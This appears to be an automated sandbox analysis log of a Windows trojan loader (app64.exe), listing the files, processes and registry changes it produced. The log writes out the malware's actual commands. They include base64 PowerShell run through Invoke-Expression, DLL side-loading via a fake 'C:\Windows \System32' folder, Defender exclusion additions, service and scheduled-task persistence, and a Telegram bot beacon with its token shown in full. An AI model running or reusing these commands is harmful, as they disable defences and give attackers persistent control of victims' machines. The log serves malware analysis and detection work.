Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF113E68 NtQuerySystemInformation, 0_2_00007FF7DF113E68
Source: C:\Windows\System32\cmd.exe File created: C:\Windows
Source: C:\Windows\System32\cmd.exe File created: C:\Windows \System32
Source: C:\Windows\System32\xcopy.exe File created: C:\Windows \System32\printui.exe
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\usvcldr64.dat
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\winsvcf
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\winsvcf\winlogsvc
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcurl.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\zlib1.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcrypto-3-x64.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libiconv-2.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libintl-9.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libssl-3-x64.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libwinpthread-1.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\console_zero.exe
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libpq.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\ucrtbased.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\vcruntime140d.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\x590769.dat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_xdtyzoyv.xau.ps1
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF111ECC 0_2_00007FF7DF111ECC
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF111B11 0_2_00007FF7DF111B11
Source: C:\Windows \System32\printui.exe Code function: 10_2_00007FF67A0E10E0 10_2_00007FF67A0E10E0
Source: C:\Windows \System32\printui.exe Code function: 13_2_00007FF67A0E10E0 13_2_00007FF67A0E10E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6600A230 28_2_6600A230
Source: C:\Windows\System32\svchost.exe Code function: 28_2_66010760 28_2_66010760
Source: C:\Windows\System32\svchost.exe Code function: 28_2_66009810 28_2_66009810
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6600BC90 28_2_6600BC90
Source: C:\Windows\System32\svchost.exe Code function: 28_2_660050A0 28_2_660050A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_66019CB0 28_2_66019CB0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6600ACD0 28_2_6600ACD0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_66004CE0 28_2_66004CE0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6600DD20 28_2_6600DD20
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6600CD60 28_2_6600CD60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6600E580 28_2_6600E580
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6600D5A0 28_2_6600D5A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_660121B0 28_2_660121B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6828A0B0 28_2_6828A0B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6828C220 28_2_6828C220
Source: C:\Windows\System32\svchost.exe Code function: 28_2_68281C10 28_2_68281C10
Source: C:\Windows\System32\svchost.exe Code function: 28_2_68283500 28_2_68283500
Source: C:\Windows\System32\svchost.exe Code function: 28_2_682926C1 28_2_682926C1
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7FC1008 28_2_00007FF8A7FC1008
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F0AD30 28_2_00007FF8A7F0AD30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F04C8C 28_2_00007FF8A7F04C8C
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7FAE9C4 28_2_00007FF8A7FAE9C4
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F02900 28_2_00007FF8A7F02900
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F043B1 28_2_00007FF8A7F043B1
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F89A90 28_2_00007FF8A7F89A90
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7FC0AB0 28_2_00007FF8A7FC0AB0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F03B00 28_2_00007FF8A7F03B00
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F0E340 28_2_00007FF8A7F0E340
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F0BCA9 28_2_00007FF8A7F0BCA9
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F0B4E0 28_2_00007FF8A7F0B4E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9331310 28_2_00007FF8A9331310
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FCA90 28_2_00007FF8A92FCA90
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93569E0 28_2_00007FF8A93569E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9344CC0 28_2_00007FF8A9344CC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9334CD0 28_2_00007FF8A9334CD0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9328B60 28_2_00007FF8A9328B60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933CB30 28_2_00007FF8A933CB30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E0EB0 28_2_00007FF8A92E0EB0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931EDC0 28_2_00007FF8A931EDC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932F0F0 28_2_00007FF8A932F0F0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93470A0 28_2_00007FF8A93470A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9332FA0 28_2_00007FF8A9332FA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A930C240 28_2_00007FF8A930C240
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D2210 28_2_00007FF8A92D2210
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931C210 28_2_00007FF8A931C210
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933A2E0 28_2_00007FF8A933A2E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A935C280 28_2_00007FF8A935C280
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F22E0 28_2_00007FF8A92F22E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933E4E0 28_2_00007FF8A933E4E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9318350 28_2_00007FF8A9318350
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EC610 28_2_00007FF8A92EC610
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933A6B0 28_2_00007FF8A933A6B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9340550 28_2_00007FF8A9340550
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9330590 28_2_00007FF8A9330590
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931C700 28_2_00007FF8A931C700
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932DAD0 28_2_00007FF8A932DAD0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EB950 28_2_00007FF8A92EB950
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9359C40 28_2_00007FF8A9359C40
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9335C20 28_2_00007FF8A9335C20
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D3C40 28_2_00007FF8A92D3C40
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9349CC1 28_2_00007FF8A9349CC1
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DFBB0 28_2_00007FF8A92DFBB0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FDEA0 28_2_00007FF8A92FDEA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9345E80 28_2_00007FF8A9345E80
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9351D30 28_2_00007FF8A9351D30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DC030 28_2_00007FF8A92DC030
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9302020 28_2_00007FF8A9302020
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932E0F0 28_2_00007FF8A932E0F0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9337FE0 28_2_00007FF8A9337FE0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932D260 28_2_00007FF8A932D260
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93592A0 28_2_00007FF8A93592A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F32C0 28_2_00007FF8A92F32C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D7400 28_2_00007FF8A92D7400
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931F420 28_2_00007FF8A931F420
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93334C0 28_2_00007FF8A93334C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D5380 28_2_00007FF8A92D5380
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93356E0 28_2_00007FF8A93356E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EB830 28_2_00007FF8A92EB830
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A934985F 28_2_00007FF8A934985F
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93438C0 28_2_00007FF8A93438C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83849E0 28_2_00007FF8B83849E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B839AA52 28_2_00007FF8B839AA52
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83B6B50 28_2_00007FF8B83B6B50
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B839A4A4 28_2_00007FF8B839A4A4
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83C04A6 28_2_00007FF8B83C04A6
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B838BA40 28_2_00007FF8B838BA40
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83B2B60 28_2_00007FF8B83B2B60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B8372B80 28_2_00007FF8B8372B80
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B8371C30 28_2_00007FF8B8371C30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B8373D50 28_2_00007FF8B8373D50
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83ACDD0 28_2_00007FF8B83ACDD0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83B3D80 28_2_00007FF8B83B3D80
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B839BE30 28_2_00007FF8B839BE30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83AFE30 28_2_00007FF8B83AFE30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83BCEC0 28_2_00007FF8B83BCEC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B837EFC0 28_2_00007FF8B837EFC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B8373FE0 28_2_00007FF8B8373FE0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B836F0C0 28_2_00007FF8B836F0C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83B00D0 28_2_00007FF8B83B00D0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74712AD10 34_2_00007FF74712AD10
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF7471050D0 34_2_00007FF7471050D0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF7471180A0 34_2_00007FF7471180A0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF7471488A8 34_2_00007FF7471488A8
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747139F50 34_2_00007FF747139F50
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747129730 34_2_00007FF747129730
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747102F90 34_2_00007FF747102F90
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74714CF64 34_2_00007FF74714CF64
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF7471357C0 34_2_00007FF7471357C0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747152000 34_2_00007FF747152000
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF7471267F0 34_2_00007FF7471267F0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747146650 34_2_00007FF747146650
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74711DE20 34_2_00007FF74711DE20
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747129E69 34_2_00007FF747129E69
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF7471176D0 34_2_00007FF7471176D0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF7471486A4 34_2_00007FF7471486A4
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74711A6F0 34_2_00007FF74711A6F0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747117D60 34_2_00007FF747117D60
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74712A5CA 34_2_00007FF74712A5CA
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74713C5DC 34_2_00007FF74713C5DC
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF7471495E8 34_2_00007FF7471495E8
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74715B484 34_2_00007FF74715B484
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747152498 34_2_00007FF747152498
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74715CCB4 34_2_00007FF74715CCB4
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747104370 34_2_00007FF747104370
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747117380 34_2_00007FF747117380
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747112390 34_2_00007FF747112390
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF7471183E0 34_2_00007FF7471183E0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747156240 34_2_00007FF747156240
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747117A20 34_2_00007FF747117A20
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747148AAC 34_2_00007FF747148AAC
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747152B10 34_2_00007FF747152B10
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747115AE0 34_2_00007FF747115AE0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747102180 34_2_00007FF747102180
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74715D20C 34_2_00007FF74715D20C
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74712A210 34_2_00007FF74712A210
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747102A10 34_2_00007FF747102A10
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83849E0 34_2_00007FF8B83849E0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B838BA40 34_2_00007FF8B838BA40
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B839AA52 34_2_00007FF8B839AA52
Source: pyld.dll.3.dr Static PE information: Number of sections : 11 > 10
Source: libwinpthread-1.dll.13.dr Static PE information: Number of sections : 12 > 10
Source: libintl-9.dll.13.dr Static PE information: Number of sections : 20 > 10
Source: libiconv-2.dll.13.dr Static PE information: Number of sections : 20 > 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f
Source: Process Memory Space: powershell.exe PID: 2124, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6620, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.evad.winEXE@89/48@10/8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\pyld.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1888:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2460:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:368:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4748:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3424:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6204:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1412:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6716:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3848:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gegny5yv.va2.ps1
Source: app64.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\app64.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: app64.exe ReversingLabs: Detection: 26%
Source: svchost.exe String found in binary or memory: -start
Source: svchost.exe String found in binary or memory: -addr
Source: svchost.exe String found in binary or memory: ../../gettext-runtime/intl/loadmsgcat.c
Source: unknown Process created: C:\Users\user\Desktop\app64.exe "C:\Users\user\Desktop\app64.exe"
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Invoke-Expression $decoded;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Invoke-Expression $decoded;"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c move /y C:\Users\Public\pyld.dll "C:\Windows \System32\printui.dll"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f && sc start x590769
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start x590769
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k DcomLaunch
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\console_zero.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: unknown Process created: C:\Windows\System32\console_zero.exe C:\Windows\System32\console_zero.exe
Source: C:\Windows\System32\console_zero.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
